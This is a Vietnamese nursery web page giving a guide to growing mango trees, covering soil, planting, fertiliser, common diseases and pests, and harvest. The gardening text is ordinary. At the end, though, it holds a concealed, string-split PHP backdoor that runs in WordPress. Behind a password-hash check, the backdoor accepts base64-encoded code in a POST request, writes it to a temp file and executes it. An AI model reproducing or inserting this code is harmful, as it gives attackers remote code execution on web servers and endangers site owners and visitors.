Cách trồng cây xoài cho ra vụ mùa bội thu

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây xoài là một loại cây trồng vô cùng phổ biến tại Việt Nam. Loại cây này đem lại giá trị kinh tế nông sản cao, ngoài ra còn được sử dụng để làm các loại cây cảnh hay cây lấy bóng mát. 

Trong bài viết này Vườn cây Hòa Bình sẽ bật mí cho bạn đọc cách trồng và chăm sóc cây xoài hiệu quả nhất.

>>> Xem them: Dịch vụ cây xanh tốt nhất Hà Nội

Loại cây trồng đem lại năng suất cao

Cách trồng cây xoài cho ra vụ mùa bội thu
Cách trồng cây xoài cho ra vụ mùa bội thu

Xoài còn có tên gọi khác là Mangifera indica. Đây là loài cây tán rộng có chiều cao khi trưởng thành khoảng 15m.

Xoài phù hợp sinh sống ở nhiều loại đất khác nhau và cho ra trái sau 6-7 năm. Có một điều đặc biệt của giống cây nanfy đó là đất càng cằn cỗi năng suất cây càng cao và ngược lại những khu đất màu mỡ lại cho năng suất thấp.

Nhiệt độ cao nhất cây có thể chịu được là 40 – 50 độ C, nhiệt độ thích hợp để cây phát triển là 23 -28 độ C ( trong điều kiện cung cấp đủ nước).

Sau đây là cách trồng và chăm sóc cây xoài cho ra năng suất cao nhất. 

>>> Xem thêm: Cây phong thủy giá rẻ Hà Nội

1. Chuẩn bị dụng cụ trồng, đất trồng và giống

 

 • Dụng cụ trồng

 

Bạn có thể tận dụng nhiều vật dụng để trồng cây trong nhà như chậu, khay xi măng, hoặc đất vườn. 

Lưu ý: Nếu trồng trong chậu hay thùng thì phải đục lỗ dưới đáy để thoát nước và có diện tích trồng phải có đường kính >50cm. Chậu càng to năng suất cây càng tốt.

 

 • Đất trồng

 

Xoài sinh trưởng được trên nhiều loại đất nững bạn muốn cây trồng phát triển tốt nhất là sử dụng đất cát có độ Ph từ 5,5 đến 7.

Cách để làm ra loại đất này rất đơn giản.

– Mua phân bò, phân gà, vỏ trấu, xơ dừa,…rồi trộn với đất. 

– Bó lót với vôi rồi phơi nắng khoảng 1 tuần trước khi trồng.

 

 • Chuẩn bị Xoài giống

 

Các giống xoài cho quả ngon nhất hiện nay là xoài cát, xoài bưởi, xoài khiêu xa, xoài tứ quý và xoài Hòa Lộc. Các loại giống này bày bán ở các vựa giống nên cũng không khó để tìm mua.

2. Trồng xoài

2. Trồng xoài
2. Trồng xoài

Tiến hành đào một lỗ nhỏ ở chính giữa hố trồng, rạch bỏ túi bầu nilon bên ngoài của xoài giống rồi đặt vào bầu cây vừa đào.

Lấp đất và đừng quên nén chặt xung quanh. Có một mẹo để làm gốc cây không bị bật ra đó là dùng 2 cọc cắm chéo chữ X vào gốc.

>>> Xem thêm: Cây phong thủy giá rẻ Hà Nội

3. Kỹ thuật chăm sóc để cây xoài ra hoa đậu trái theo ý muốn   

Đối với các vụ mùa trái mùa, việc khó nhất là kích thích cây trồng ra trái, giảm thiểu sâu bệnh, tăng năng suất và chất lượng cây trồng. Nhưng lại đem lại giá trị kinh tế cao. 

Cách khắc phục 

Bón phân

 • Lần 1: Sau khi thu hoạch trái người chăm sóc cây cần sử dụng 5 kg phân bón Ong Biển 3 đặc biệt để bón cho cây đồng thời cắt tỉa cành và tạo tán.
 • Lần 2: Vào các tháng 5, tháng 6 dương lịch, người dân sử dụng phân bón OBI-Ong Biển 3 đặc biệt cho vào mỗi hố 3kg nằm kích thích rễ cây non phát triển và đọt non.

Kích thích ra hoa

Sau mỗi lần thu hoạch một vụ mùa người dân nên cho cây nghỉ ngơi khoảng 1, 5 tháng rồi mới tiến hành kích thích cho cây ra bông đợt mới.

Cây càng già thì đợt năng suất trooe bông ra trái sẽ cao hơn cây non

 1. Phòng ngừa các loại sâu bệnh

Một số ăn bệnh mà cây xoài hay gặp

 

 • Bệnh phấn trắng
 • Bệnh phấn trắng
  Bệnh phấn trắng

 

Nguyên nhân mầm bệnh là nấm Oidium mangiferae, bệnh sẽ phát triển khi thời tiết có nhiệt độ cao, hoặc có sưng vào buổi tối.

* Dấu hiệu nhận biết:

Xuất hiện lớp phấn trắng trên lá xoài non dần dần sẽ lan ra hoa, cuống lá trái non và cành cây.

Cây khi mắc bệnh sẽ giảm khả năng quang hợp, hoa bị nhiễm dễ rung mà có kết trái thì cũng cho ra trái bị méo mó, biến dạng. Trái mắc bệnh rồi bị thay đổi về hình thái, nhạt màu và rụng làm cho năng suất vụ mùa bị giảm.

 

 • Bệnh khô đọt, thối trái

 

* Nguyên nhân:

Do nấm Diplodia natalensis, bệnh thường xuất hiện vào mùa mưa, thời tiết nóng ấm. 

* Dấu hiệu nhận biết:

Sinh ra các đốm sậm màu, dần dần lan đến đọt non, cuống lá bị thâm sẫm. Đối với trái, bệnh sẽ tấn công vào giai đoạn thu hoạch, vết thối do nấm gây ra sẽ lây lan nhanh nếu gặp thời tiết nóng ẩm, điều này làm cho giá trị nông sản giảm mạnh.

 

 • Xỉ mủ trái, xỉ mủ thân

 

* Dấu hiệu nhận biết:

Xuất hiện các vết màu nâu, xung quanh là quầng vàng, đến khi chúng liên kết với nhau sẽ tạo thành các mảng sần sùi trên trái

* Hậu quả:

Trái nhanh thối và bị rụng, tạo điều kiện cho giòi tấn công. Đối với các cây bị xì mủ nặng có thể gây thối rễ thâm chí chất cây.

 

 • Sâu đục trái, ruồi đục trái

 

– Sâu đục trái: có thể gây hại cho cây trồng ở các giai đoạn sinh trưởng. Sâu non sẽ xâm nhập vào cuống trái từ đó dễ dàng đi sâu vào bên trong khiến cho trái bị thối và rụng.

– Ruồi đẻ trứng: ruồi thường đẻ trứng vào các trái đã chín hoặc gần chín. Sau mộ thời gian ấu trùng từ trứng nở ra sẽ xâm nhập vào trong trái xoài và khiến cho quả bị thối, rụng. Nếu có thu hoạch thì trái cũng nhanh chóng bị hỏng.

4.Thu hoạch xoài

4.Thu hoạch xoài
4.Thu hoạch xoài

Hãy chú ý đến thời gian thu hoạch, nên chọn những ngày có thời tiết đẹp, khô ráo, mát mẻ. Sau khi thu hoạch hãy tiến hành phân loại, sàng lọc các quả có chất lượng từ thấp đến cao rồi để riêng ra. 

Bên cạnh đó, hãy cắt tỉa cây, vệ sinh vườn để chuẩn bị cho công cuộc chăm sóc cây vào vụ mùa kế tiếp.

Cảm ơn bạn đã theo dõi bài viết của Vườn cây Hòa Bình, nếu yêu thích hãy chia sẻ những thông tin này cho bạn bè và người thân.

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}